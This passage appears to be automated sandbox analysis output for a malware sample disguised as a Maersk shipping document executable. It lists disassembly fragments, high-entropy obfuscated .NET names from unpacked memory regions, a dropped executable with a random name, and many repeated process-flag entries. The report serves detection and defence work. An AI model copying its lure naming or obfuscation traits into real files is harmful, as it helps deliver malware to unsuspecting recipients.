                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 0_2_07C49939 push A7D807C5h; ret 0_2_07C49946
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 0_2_084A7211 push FFFFFFFDh; ret 0_2_084A7225
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_004031D0 push eax; ret 3_2_004031D2
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_004169E7 push 0F6CFD2Bh; ret 3_2_00416A18
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00423A0A push esp; ret 3_2_00423A0D
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00419359 push ds; ret 3_2_0041935B
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00418366 pushad ; iretd 3_2_00418367
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00408325 push dword ptr [ebx+5Dh]; ret 3_2_0040830B
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00417388 push edi; ret 3_2_0041738D
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00419477 push edx; ret 3_2_00419485
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00408403 push 00000074h; iretd 3_2_0040840B
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00417411 push eax; ret 3_2_00417414
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00411D6F push ds; iretd 3_2_00411DBD
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00411D7B push ds; iretd 3_2_00411DBD
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0041758A push ebp; ret 3_2_004175A6
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0040D66A push ecx; iretd 3_2_0040D6D9
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00414E05 push cs; retf 3_2_00414E14
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0040860D push cs; retf 3_2_0040860E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00413E93 pushfd ; ret 3_2_00413F00
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_00413EBC pushfd ; ret 3_2_00413F00
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0177225F pushad ; ret 3_2_017727F9
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017727FA pushad ; ret 3_2_017727F9
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A09AD push ecx; mov dword ptr [esp], ecx3_2_017A09B6
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0177283D push eax; iretd 3_2_01772858
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeCode function: 5_2_0250AA95 push ds; iretd 5_2_0250AAD7
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeCode function: 5_2_0250AA89 push ds; iretd 5_2_0250AAD7
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeCode function: 5_2_025102A4 push ebp; ret 5_2_025102C0
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeCode function: 5_2_0250DB1F push cs; retf 5_2_0250DB2E
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeCode function: 5_2_02501327 push cs; retf 5_2_02501328
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeCode function: 5_2_0250CBD6 pushfd ; ret 5_2_0250CC1A
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeCode function: 5_2_02506384 push ecx; iretd 5_2_025063F3
                Source: MAERSK LINE SHIPPING DOC_4253.exeStatic PE information: section name: .text entropy: 7.6234510150876185
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, vRZWAsohNfhPZndlcA.csHigh entropy of concatenated method names: 'R86YAfmxil', 'MouY6rAqRY', 'BH1YwBHoW1', 'FVGY5fHCko', 'lPTY1tW1Oq', 'IShYUbGQfW', 'FUmYu0uDtk', 'OCvYNE5NY0', 'yySYMrsypo', 'KlHYWZ8Mi4'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, wabeSddRDnYfb5JXpy.csHigh entropy of concatenated method names: 'zMx8K3XGbl', 'MNs8HNJuyY', 'z7K8kyBNjx', 'NTp8F40h1t', 'MMG8OMwmdB', 'Ws78q1GZRU', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, kpvM8UyIYTVMi9bPW0W.csHigh entropy of concatenated method names: 'KOOcdA8BXJ', 'MUlczLvWCe', 'AOwCr43q3H', 'WXsy6vNbKXZBE2VppwI', 'mZQei9NQyCkE6Cffg7a', 'CWqKK6N6WoD61s9iR8D', 'v7sCqKNfAVxSuPAFSwt'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, bawXrceLwum0Z3TqTZ.csHigh entropy of concatenated method names: 'YCf7qju1t', 'A2xblGokV', 'dIhGKiigg', 'jpZTPCR9l', 'pci6uL4Bt', 'mPCXvXmr9', 'JWZ8k7tQKKe6anEKSJ', 'ks70p5B2FOnBKrapUa', 'yNTaLHNFf', 'XOE8WiGGL'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, j8r72As8idYiS4cyJQ.csHigh entropy of concatenated method names: 'Dispose', 'bEgyZrE1Kp', 'o2ee5J8PUB', 'oDpFWKbUBO', 'B7gydWjG7v', 'g9FyzNZPo9', 'ProcessDialogKey', 'XHoerPq4LI', 'giwey1UJfw', 'KpweeBabeS'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, S0vDJggWwrTvsI39Ur.csHigh entropy of concatenated method names: 'UHtEVMgjsx', 'sKoEdfNHes', 'jp2ar9ZeUN', 'awUayXo6F1', 'ivFEWtE2PL', 'kHZE96MDEs', 'poJEoMUIAm', 'kY7EmPI4UG', 'YuWERrDKim', 'AXYEjABlbX'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, zKCvYgyr0bX92gCtwI7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QQO8W56EcL', 'BFK89Vc2oL', 'IVH8os1hOP', 'x878m92xpK', 'Nu08Rmsm7M', 'YB38jDHO02', 'QwE82pqtNe'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, jMa7fjAUpnw3QeHttd.csHigh entropy of concatenated method names: 'QUasmJHSQf', 'cwAsROPE5f', 'UExsjK5Hok', 'IB9s2bL4Ig', 'bvpsL017DK', 'E75sgKm09E', 'xE6slhRcCb', 'J5FsVmPqym', 'UxFsZ0HQl4', 'TYtsdFWFBX'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, PwOTdlyeCiJ3uIiJPe5.csHigh entropy of concatenated method names: 'ToString', 'N0EcANHGsE', 'sx5c6pG5Nf', 'xtwcX03vwn', 'YGTcwile9P', 'x8ac5ddcmV', 'm79c4TySkb', 'yMxc1KLRtY', 'igK9goNenhKLgXLJslM', 'fxOFdxN2gnOH1kZAQUC'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, QPq4LIZKiw1UJfw3pw.csHigh entropy of concatenated method names: 'FQfOwdk3Gn', 'zCBO5dQIDq', 'BC2O4vLTwc', 'w0KO1dCNZq', 'vktOUkZHMi', 'AYPO31FtZN', 'UjLOuB7m3R', 'S6IONYCh6a', 'UcoOf9OyrQ', 'FxEOMIcOye'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, IvLq0PjlYlfLDXgg9O.csHigh entropy of concatenated method names: 'ToString', 'znSJWlgN4n', 'bodJ5xvKen', 'OUFJ4pK8XS', 'CBEJ1BFthu', 'jpIJUwbGbN', 'QTLJ3VGc3H', 'fhrJubf4QW', 'FF1JN3VYXp', 'YAaJfLWYaZ'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, STaxYklw1yEgrE1Kpn.csHigh entropy of concatenated method names: 'B5SOxqawuj', 'XkuOEVnukK', 'SWwOOgYUg4', 'fkXOcsF3cj', 'yy3OtjJ7Eq', 'KrHOhfRp69', 'Dispose', 'pDGapkrqRj', 'Sd9as1kNhw', 'Cq9aKK8iHn'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, bGnndwySKFCcgL2sCpY.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VtnCOvYeJ4', 'LP7C8YOipQ', 'PwwCcUTxGa', 's4WCCsOWFv', 'D3ZCthXjny', 'WFCCBq7NJQ', 'olTCh4j8FL'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, gHmL0kwtwZ7Mumre3n.csHigh entropy of concatenated method names: 'RJykQHxc9m', 'iCQks8UjAr', 'KXckHEylv7', 'cjSkFIj2jI', 'JP0kqoonSl', 'EdOHLJ7L0C', 'PRkHg1WvMC', 'fRuHlbLTm2', 'DykHVeEKB5', 'fy4HZNne5C'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, LOJZPfXt2FGKeSgt0g.csHigh entropy of concatenated method names: 'hMQHnHELtT', 'POxHTXVqJp', 'WlIK41TsVH', 'J96K1VHEvc', 'eB2KUqKxc8', 'xw3K390XmH', 'GnnKu1tqPR', 'lFxKNoi7qI', 'yoKKffklqb', 'XJ3KMkaC9h'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, nbBDPMm3oKMd8kpqak.csHigh entropy of concatenated method names: 'NqrxMCYINs', 'iHqx9S4TcX', 'jDkxmNbx3A', 'fDgxRhU25r', 'rv0x5I9EoF', 'Sfrx41P117', 'I5kx1DM4r1', 'S2pxUWNvGT', 'hdgx366u0E', 'DdOxuWBOB4'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, yKoC5buAMIMKkp30fh.csHigh entropy of concatenated method names: 'EIrFpdVrL1', 'JOSFK08kTK', 'U0CFkFVCdf', 'KinkdInYAp', 'yL7kzj8Vqh', 'MLqFrIgMJX', 'k7WFyLOJaP', 'XGtFeXGsmb', 'pqQFIYxe2U', 'DeiFSVIPNG'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, GjEoshzSMiw0QBR6Ga.csHigh entropy of concatenated method names: 'zB88GvFfFf', 'tQC8Axg7NF', 'BOw86bUNNy', 'eSY8wrCuyb', 'yMi85RD9R6', 'HMF81A4eoS', 'Erp8UwBmK3', 'Edp8hpmlyK', 'xrq8ig60FN', 'n7b8D3fwoX'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, dogh2EfGaOjNmEE8r0.csHigh entropy of concatenated method names: 'P0KFiuHjK9', 'tFEFD5lgBc', 'jgpF77MCt6', 'QVdFbvHIJx', 'R2VFnwD2AW', 'yq6FGU1ZCg', 'zOYFTculHB', 'sEmFA2IsnO', 'bLsF6dGtjp', 'vk0FXxUw2m'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, KuvLiTyyfgfolb21JDH.csHigh entropy of concatenated method names: 'o058dK2uDj', 'sg38zUG3Jw', 'P2LcrGll5i', 'uuecy12s4i', 'lJ0ceqlS08', 'e1ecIiy6S1', 'tA2cSorU6t', 'h8qcQoRX9N', 'Fobcp5EHSB', 'n2CcswG89y'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, qZNQQv6AySLa31WhNS.csHigh entropy of concatenated method names: 'l9nKbkkYCT', 'crtKGg97k7', 'aG9KAYb7j8', 'UbAK6QlBTV', 'VDeKx5f9E1', 'tJvKJ6YXl1', 'Qp0KEb0WDp', 'isZKaRFrUS', 're3KOCEt5B', 'fd6K80ZsiX'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, uwJUeTqjPGwpbVfh4n.csHigh entropy of concatenated method names: 'goMIQVglnP', 'nyUIpOympO', 'OGUIsFErLA', 'o3lIKjOMVx', 'WevIH57Sq4', 'B4iIkQ4EAL', 'JPjIF0haDB', 'L6yIqxtpN2', 'QyII0VaFWI', 'rd5IPOfNl9'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.9930000.4.raw.unpack, KAfPYRSVUrEc0Y7smc.csHigh entropy of concatenated method names: 'HvkyFMa7fj', 'Jpnyqw3QeH', 'mAyyPSLa31', 'OhNyvSuOJZ', 'dgtyx0gKHm', 'U0kyJtwZ7M', 'pR3YKZIqhvuTN3FnZ8', 'qqEFSgRTG23qojUp6u', 'vc9yylo6ZM', 'cpRyI4EuVP'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, vRZWAsohNfhPZndlcA.csHigh entropy of concatenated method names: 'R86YAfmxil', 'MouY6rAqRY', 'BH1YwBHoW1', 'FVGY5fHCko', 'lPTY1tW1Oq', 'IShYUbGQfW', 'FUmYu0uDtk', 'OCvYNE5NY0', 'yySYMrsypo', 'KlHYWZ8Mi4'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, wabeSddRDnYfb5JXpy.csHigh entropy of concatenated method names: 'zMx8K3XGbl', 'MNs8HNJuyY', 'z7K8kyBNjx', 'NTp8F40h1t', 'MMG8OMwmdB', 'Ws78q1GZRU', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, kpvM8UyIYTVMi9bPW0W.csHigh entropy of concatenated method names: 'KOOcdA8BXJ', 'MUlczLvWCe', 'AOwCr43q3H', 'WXsy6vNbKXZBE2VppwI', 'mZQei9NQyCkE6Cffg7a', 'CWqKK6N6WoD61s9iR8D', 'v7sCqKNfAVxSuPAFSwt'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, bawXrceLwum0Z3TqTZ.csHigh entropy of concatenated method names: 'YCf7qju1t', 'A2xblGokV', 'dIhGKiigg', 'jpZTPCR9l', 'pci6uL4Bt', 'mPCXvXmr9', 'JWZ8k7tQKKe6anEKSJ', 'ks70p5B2FOnBKrapUa', 'yNTaLHNFf', 'XOE8WiGGL'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, j8r72As8idYiS4cyJQ.csHigh entropy of concatenated method names: 'Dispose', 'bEgyZrE1Kp', 'o2ee5J8PUB', 'oDpFWKbUBO', 'B7gydWjG7v', 'g9FyzNZPo9', 'ProcessDialogKey', 'XHoerPq4LI', 'giwey1UJfw', 'KpweeBabeS'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, S0vDJggWwrTvsI39Ur.csHigh entropy of concatenated method names: 'UHtEVMgjsx', 'sKoEdfNHes', 'jp2ar9ZeUN', 'awUayXo6F1', 'ivFEWtE2PL', 'kHZE96MDEs', 'poJEoMUIAm', 'kY7EmPI4UG', 'YuWERrDKim', 'AXYEjABlbX'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, zKCvYgyr0bX92gCtwI7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QQO8W56EcL', 'BFK89Vc2oL', 'IVH8os1hOP', 'x878m92xpK', 'Nu08Rmsm7M', 'YB38jDHO02', 'QwE82pqtNe'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, jMa7fjAUpnw3QeHttd.csHigh entropy of concatenated method names: 'QUasmJHSQf', 'cwAsROPE5f', 'UExsjK5Hok', 'IB9s2bL4Ig', 'bvpsL017DK', 'E75sgKm09E', 'xE6slhRcCb', 'J5FsVmPqym', 'UxFsZ0HQl4', 'TYtsdFWFBX'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, PwOTdlyeCiJ3uIiJPe5.csHigh entropy of concatenated method names: 'ToString', 'N0EcANHGsE', 'sx5c6pG5Nf', 'xtwcX03vwn', 'YGTcwile9P', 'x8ac5ddcmV', 'm79c4TySkb', 'yMxc1KLRtY', 'igK9goNenhKLgXLJslM', 'fxOFdxN2gnOH1kZAQUC'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, QPq4LIZKiw1UJfw3pw.csHigh entropy of concatenated method names: 'FQfOwdk3Gn', 'zCBO5dQIDq', 'BC2O4vLTwc', 'w0KO1dCNZq', 'vktOUkZHMi', 'AYPO31FtZN', 'UjLOuB7m3R', 'S6IONYCh6a', 'UcoOf9OyrQ', 'FxEOMIcOye'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, IvLq0PjlYlfLDXgg9O.csHigh entropy of concatenated method names: 'ToString', 'znSJWlgN4n', 'bodJ5xvKen', 'OUFJ4pK8XS', 'CBEJ1BFthu', 'jpIJUwbGbN', 'QTLJ3VGc3H', 'fhrJubf4QW', 'FF1JN3VYXp', 'YAaJfLWYaZ'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, STaxYklw1yEgrE1Kpn.csHigh entropy of concatenated method names: 'B5SOxqawuj', 'XkuOEVnukK', 'SWwOOgYUg4', 'fkXOcsF3cj', 'yy3OtjJ7Eq', 'KrHOhfRp69', 'Dispose', 'pDGapkrqRj', 'Sd9as1kNhw', 'Cq9aKK8iHn'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, bGnndwySKFCcgL2sCpY.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VtnCOvYeJ4', 'LP7C8YOipQ', 'PwwCcUTxGa', 's4WCCsOWFv', 'D3ZCthXjny', 'WFCCBq7NJQ', 'olTCh4j8FL'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, gHmL0kwtwZ7Mumre3n.csHigh entropy of concatenated method names: 'RJykQHxc9m', 'iCQks8UjAr', 'KXckHEylv7', 'cjSkFIj2jI', 'JP0kqoonSl', 'EdOHLJ7L0C', 'PRkHg1WvMC', 'fRuHlbLTm2', 'DykHVeEKB5', 'fy4HZNne5C'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, LOJZPfXt2FGKeSgt0g.csHigh entropy of concatenated method names: 'hMQHnHELtT', 'POxHTXVqJp', 'WlIK41TsVH', 'J96K1VHEvc', 'eB2KUqKxc8', 'xw3K390XmH', 'GnnKu1tqPR', 'lFxKNoi7qI', 'yoKKffklqb', 'XJ3KMkaC9h'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, nbBDPMm3oKMd8kpqak.csHigh entropy of concatenated method names: 'NqrxMCYINs', 'iHqx9S4TcX', 'jDkxmNbx3A', 'fDgxRhU25r', 'rv0x5I9EoF', 'Sfrx41P117', 'I5kx1DM4r1', 'S2pxUWNvGT', 'hdgx366u0E', 'DdOxuWBOB4'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, yKoC5buAMIMKkp30fh.csHigh entropy of concatenated method names: 'EIrFpdVrL1', 'JOSFK08kTK', 'U0CFkFVCdf', 'KinkdInYAp', 'yL7kzj8Vqh', 'MLqFrIgMJX', 'k7WFyLOJaP', 'XGtFeXGsmb', 'pqQFIYxe2U', 'DeiFSVIPNG'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, GjEoshzSMiw0QBR6Ga.csHigh entropy of concatenated method names: 'zB88GvFfFf', 'tQC8Axg7NF', 'BOw86bUNNy', 'eSY8wrCuyb', 'yMi85RD9R6', 'HMF81A4eoS', 'Erp8UwBmK3', 'Edp8hpmlyK', 'xrq8ig60FN', 'n7b8D3fwoX'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, dogh2EfGaOjNmEE8r0.csHigh entropy of concatenated method names: 'P0KFiuHjK9', 'tFEFD5lgBc', 'jgpF77MCt6', 'QVdFbvHIJx', 'R2VFnwD2AW', 'yq6FGU1ZCg', 'zOYFTculHB', 'sEmFA2IsnO', 'bLsF6dGtjp', 'vk0FXxUw2m'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, KuvLiTyyfgfolb21JDH.csHigh entropy of concatenated method names: 'o058dK2uDj', 'sg38zUG3Jw', 'P2LcrGll5i', 'uuecy12s4i', 'lJ0ceqlS08', 'e1ecIiy6S1', 'tA2cSorU6t', 'h8qcQoRX9N', 'Fobcp5EHSB', 'n2CcswG89y'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, qZNQQv6AySLa31WhNS.csHigh entropy of concatenated method names: 'l9nKbkkYCT', 'crtKGg97k7', 'aG9KAYb7j8', 'UbAK6QlBTV', 'VDeKx5f9E1', 'tJvKJ6YXl1', 'Qp0KEb0WDp', 'isZKaRFrUS', 're3KOCEt5B', 'fd6K80ZsiX'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, uwJUeTqjPGwpbVfh4n.csHigh entropy of concatenated method names: 'goMIQVglnP', 'nyUIpOympO', 'OGUIsFErLA', 'o3lIKjOMVx', 'WevIH57Sq4', 'B4iIkQ4EAL', 'JPjIF0haDB', 'L6yIqxtpN2', 'QyII0VaFWI', 'rd5IPOfNl9'
                Source: 0.2.MAERSK LINE SHIPPING DOC_4253.exe.44e6400.2.raw.unpack, KAfPYRSVUrEc0Y7smc.csHigh entropy of concatenated method names: 'HvkyFMa7fj', 'Jpnyqw3QeH', 'mAyyPSLa31', 'OhNyvSuOJZ', 'dgtyx0gKHm', 'U0kyJtwZ7M', 'pR3YKZIqhvuTN3FnZ8', 'qqEFSgRTG23qojUp6u', 'vc9yylo6ZM', 'cpRyI4EuVP'
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
